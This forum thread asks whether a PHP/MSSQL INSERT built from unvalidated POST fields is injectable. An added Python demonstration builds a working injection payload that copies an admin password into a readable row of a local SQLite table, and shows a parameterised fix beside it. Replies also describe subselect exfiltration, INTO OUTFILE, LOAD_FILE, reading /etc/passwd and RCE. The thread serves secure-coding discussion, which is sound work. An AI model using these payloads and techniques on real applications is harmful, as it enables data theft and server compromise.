SQLi susceptible?
alex.barylski
- DevNet Evangelist
- Posts: 6267
- Joined: Tue Dec 21, 2004 5:00 pm
- Location: Winnipeg
SQLi susceptible?
I have the following SQL I just stumbled upon and have checked all previous code to ensure nothing was being changed. These $_POST globals are not validated and appear to be used inline in the SQL statement: an injection waiting to occur, or am I missing something?
[sql]
$ins_qry_def = "INSERT INTO PORTAL_USER (pu_id_admin, pu_id_sha1, pum_id, pu_licenses, spl_id, sp_id, wtc_id, usr, eml, pwd, pu_salute, pu_fname, pu_mname, pu_lname, trusted, active, userid, datemod) VALUES (NULL, NULL, "
    . "'" . ($_POST['memtype'] == 2 ? "3" : $_POST['memtype']) . "'"
    . ", " . "'" . ($_POST['memtype'] == 3 ? "5" : $_POST['memtype'] == 2 ? "1" : "0") . "'"
    . ", '0', '0', '0', "
    . "'" . mssql_escape($_POST['username']) . "'"
    . ", " . "'" . mssql_escape($_POST['emaiaddr']) . "'"
    . ", " . "'" . $_POST['password'] . "'"
    . ", NULL, "
    . "'" . mssql_escape($_POST['firsname']) . "'"
    . ", NULL, "
    . "'" . mssql_escape($_POST['lastname']) . "'"
    . ", '0', '1', '0', GETDATE())";
[/sql]
Is this code vulnerable to SQLi or not because the injected insecure variables are inside 'VALUES'?
What POST variable would be best used to carry out a SELECT to find all users in database or similar?
Seeing as I have never actually carried out a SQL exploit, would someone demonstrate using the code above as a starting point?
alex.barylski
- DevNet Evangelist
- Posts: 6267
- Joined: Tue Dec 21, 2004 5:00 pm
- Location: Winnipeg
Re: SQLi susceptible?
By the way this is a MSSQL database not sure if that changes anything?
Re: SQLi susceptible?
I think this line is vulnerable to SQL injections:
Code: Select all
"."'".($_POST['memtype']==2 ? "3" : $_POST['memtype'])."'".",
You may use a subselect query to insert some secret data from the DB into a record which you can view later.
There are 10 types of people in this world, those who understand binary and those who don't
alex.barylski
- DevNet Evangelist
- Posts: 6267
- Joined: Tue Dec 21, 2004 5:00 pm
- Location: Winnipeg
Re: SQLi susceptible?
Quote:
You may use a subselect query to insert some secret data from the DB into a record which you can view later.
Can you show me how I might go about doing that? Why would I insert data? The argument has to be strong enough that it warrants a re-design of the entire application -- it's beyond refactoring.
I figure if anything will get them to agree it'll be security issues which can expose their data.
Re: SQLi susceptible?
Just set the value of $_POST['memtype'] to a string which will construct a proper query for the attacked insert and add a "comment" char sequence at its end in order to remove the rest of the original query.
PS: I'm not sure we are permitted to discuss such things in this forum.
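The two replies above (use a subselect to copy secret data into a record you can read back, and terminate the statement with a comment sequence) can be shown end to end. The following is an added example, not code from the thread or from the project being discussed: it re-creates the string concatenation from the first post in Python and runs it against an in-memory SQLite table, so the payload can be executed offline. It goes one step beyond the thread by also showing the hardened form (an integer cast for memtype plus parameter binding for the rest). Assumptions: mssql_escape() is the project's own helper and is modelled as doubling single quotes; GETDATE() is replaced by CURRENT_TIMESTAMP because SQLite has no GETDATE(); the table layout and the seeded admin row are constructed for the demo and are not the project's real schema; the comparison of memtype with 2 and 3 is done as a string comparison rather than PHP's loose comparison.

```python
import sqlite3

# Added example, not code from the thread. It mirrors the poster's PHP string
# concatenation and runs it against SQLite so the unescaped $_POST['memtype']
# can be exercised. Assumptions (none of this is the project's real code):
#   * mssql_escape() is the project's helper, modelled as doubling single quotes;
#   * GETDATE() becomes CURRENT_TIMESTAMP because SQLite has no GETDATE();
#   * the table and the seeded admin row are constructed for the demo.

COLUMNS = ("pu_id_admin, pu_id_sha1, pum_id, pu_licenses, spl_id, sp_id, wtc_id, "
           "usr, eml, pwd, pu_salute, pu_fname, pu_mname, pu_lname, trusted, "
           "active, userid, datemod")


def mssql_escape(s):
    # Assumed behaviour of the project's helper: double single quotes.
    return s.replace("'", "''")


def build_insert_vulnerable(post):
    """Mirror of $ins_qry_def: memtype and password are concatenated unescaped."""
    memtype = post["memtype"]
    pum_id = "3" if memtype == "2" else memtype
    pu_licenses = "5" if memtype == "3" else ("1" if memtype == "2" else "0")
    return (
        "INSERT INTO PORTAL_USER (" + COLUMNS + ") VALUES (NULL, NULL, "
        "'" + pum_id + "', '" + pu_licenses + "', '0', '0', '0', "
        "'" + mssql_escape(post["username"]) + "', "
        "'" + mssql_escape(post["emaiaddr"]) + "', "
        "'" + post["password"] + "', NULL, "
        "'" + mssql_escape(post["firsname"]) + "', NULL, "
        "'" + mssql_escape(post["lastname"]) + "', '0', '1', '0', CURRENT_TIMESTAMP)"
    )


def build_insert_safe(post):
    """Hardened form: cast memtype to int, bind every user value as a parameter."""
    memtype = int(post["memtype"])  # raises ValueError on anything non-numeric
    pum_id = 3 if memtype == 2 else memtype
    pu_licenses = 5 if memtype == 3 else (1 if memtype == 2 else 0)
    sql = ("INSERT INTO PORTAL_USER (" + COLUMNS + ") VALUES (NULL, NULL, ?, ?, "
           "'0', '0', '0', ?, ?, ?, NULL, ?, NULL, ?, '0', '1', '0', CURRENT_TIMESTAMP)")
    params = (pum_id, pu_licenses, post["username"], post["emaiaddr"],
              post["password"], post["firsname"], post["lastname"])
    return sql, params


def fresh_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE PORTAL_USER (" + COLUMNS + ")")
    # Constructed victim row: its pwd column is the value we want to leak.
    con.execute("INSERT INTO PORTAL_USER VALUES (1, NULL, 1, 5, 0, 0, 0, 'admin', "
                "'admin@example.test', 'S3cretHashValue', NULL, 'Site', NULL, "
                "'Admin', 1, 1, 1, CURRENT_TIMESTAMP)")
    return con


# Payload for $_POST['memtype']: close the pum_id literal, supply the remaining
# 15 values ourselves (pu_fname becomes a subselect of the admin's pwd), close
# the VALUES list, then comment out the rest of the original statement with --.
PAYLOAD = ("1', '0', '0', '0', '0', 'leak', 'leak@example.test', 'x', NULL, "
           "(SELECT pwd FROM PORTAL_USER WHERE usr = 'admin'), NULL, 'x', "
           "'0', '1', '0', CURRENT_TIMESTAMP)--")

BENIGN_POST = {"memtype": "1", "username": "bob", "emaiaddr": "bob@example.test",
               "password": "hunter2", "firsname": "Bob", "lastname": "O'Brien"}
HOSTILE_POST = dict(BENIGN_POST, memtype=PAYLOAD)


def run_vulnerable(post):
    """Execute the concatenated INSERT; return (usr, pu_fname) of the newest row."""
    con = fresh_db()
    con.execute(build_insert_vulnerable(post))
    return con.execute("SELECT usr, pu_fname FROM PORTAL_USER "
                       "ORDER BY rowid DESC LIMIT 1").fetchone()


def run_safe(post):
    """Execute the parameterised INSERT; return the new row, or None if rejected."""
    con = fresh_db()
    try:
        sql, params = build_insert_safe(post)
    except ValueError:
        return None
    con.execute(sql, params)
    return con.execute("SELECT usr, pu_fname, pum_id FROM PORTAL_USER "
                       "ORDER BY rowid DESC LIMIT 1").fetchone()


if __name__ == "__main__":
    print(run_vulnerable(BENIGN_POST))   # ('bob', 'Bob')
    print(run_vulnerable(HOSTILE_POST))  # ('leak', 'S3cretHashValue')
    print(run_safe(HOSTILE_POST))        # None
```

The hostile run creates a user named "leak" whose first-name field holds the admin row's pwd value, which is exactly the "insert secret data into a record you can view later" pattern; everything the application appended after the payload is swallowed by the trailing comment. In the safe variant the same payload fails the integer cast before any SQL is built, and the remaining fields travel as bound parameters rather than as text.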
alex.barylski
- DevNet Evangelist
- Posts: 6267
- Joined: Tue Dec 21, 2004 5:00 pm
- Location: Winnipeg
Re: SQLi susceptible?
I have seen worse.
Besides, I don't think I have ever said or insinuated anything in the past to suggest I was interested in hacking. I joined a project really late and it's in serious need of repair.
- kaisellgren
- DevNet Resident
- Posts: 1675
- Joined: Sat Jan 07, 2006 5:52 am
- Location: Lahti, Finland.
Re: SQLi susceptible?
Yes, it is vulnerable to SQL injection attacks. I do not understand: you have mssql_escape() at the end of the query, but why did you not escape the "memtype" values? MySQL, for instance, allows an "INSERT INTO ... SELECT", so an attacker can just close the parenthesis and start a SELECT clause and use something like SELECT INTO OUTFILE and save all your database info into a publicly readable file. That's just one example of exploiting that line. Another common way I like to crack web applications is that I upload an image to the server (many websites allow it in one way or another) that contains XSS, then I use the LOADFILE() command in MySQL to load the XSS into your database, and most likely the data is being shown at some point in the application.
Re: SQLi susceptible?
kaisellgren wrote:
Another common way I like to crack web applications is that I upload an image to the server (many websites allow it in one way or another) that contains XSS, then I use the LOADFILE() command in MySQL to load the XSS into your database, and most likely the data is being shown at some point in the application.
It's even worse when a SELECT (not INSERT) query is vulnerable. In such a case, a SQL injection using OUTFILE is the worst that could happen to a web application (leading to a successful RCE).
@PCSpectra
I suspect that $_POST['memtype'] is validated somewhere in the code. Maybe a
Code: Select all
$_POST['memtype'] = intval($_POST['memtype'])
line could be found.
- kaisellgren
- DevNet Resident
- Posts: 1675
- Joined: Sat Jan 07, 2006 5:52 am
- Location: Lahti, Finland.
Re: SQLi susceptible?
VladSun wrote:
It's even worse when a SELECT (not INSERT) query is vulnerable. In such a case, a SQL injection using OUTFILE is the worst that could happen to a web application (leading to a successful RCE).
I'm not sure which is the worst thing that could happen to an application. DROP statements being vulnerable could have catastrophic damage, while SELECT would allow both RCE and LFI and almost anything, such as getting /etc/passwd. I knew a guy whose hosting account was closed because an attacker exploited a vulnerability in a CREATE statement and made so much spam that the database became too big; the hosting company kicked the customer out of their servers and he lost all data, including the nightly backups.
Re: SQLi susceptible?
A RCE would permit you to do anything you want (i.e. as Apache user) - including DROP, CREATE, exposing local files, etc. That's why I think that RCE is one of the worst exploits that could happen to a web application.
PS: BTW, I still encourage you to participate in the hack game I offered you earlier - it's "this is a web site - root its server". I haven't played such a game at other hack-game sites.
- kaisellgren
- DevNet Resident
- Posts: 1675
- Joined: Sat Jan 07, 2006 5:52 am
- Location: Lahti, Finland.
Re: SQLi susceptible?
VladSun wrote:
A RCE would permit you to do anything you want (i.e. as Apache user) - including DROP, CREATE, exposing local files, etc. That's why I think that RCE is one of the worst exploits that could happen to a web application.
PS: BTW, I still encourage you to participate in the hack game I offered you earlier - it's "this is a web site - root its server". I haven't played such a game at other hack-game sites.
You can also end up in a similar situation using an LFI, providing that you have the skills, the time and the interest.
Isn't it spelled an LFI, an RCE, an SQL Injection, because you use "an" whenever you say the first letter as a vowel, right? Just thinking.
What was the link to that website?
Re: SQLi susceptible?
kaisellgren wrote:
What was the link to that website?
http://www.gat3way.eu/hack
alex.barylski
- DevNet Evangelist
- Posts: 6267
- Joined: Tue Dec 21, 2004 5:00 pm
- Location: Winnipeg
Re: SQLi susceptible?
Quote:
I suspect that $_POST['memtype'] is validated somewhere in the code. Maybe a:
In many instances there is an explicit cast, etc. that is done, but on my first day I stumbled upon a line which didn't, and when I mentioned it, the other developer simply told me to cast.
Security like this makes me nervous as hell. They appear to be using prepared statements, or so it has been said, but I'm not sure if it's still secure, as there is a lot of dynamically generated SQL.
The developer before had the common sense to at least disable DELETEs: anytime a record is removed it actually only has a flag set which prevents it from being displayed. Not sure I agree with that design, but at least in an ad hoc environment it prevents the DB from being trashed. Oddly, he appears to have a religious backup strategy.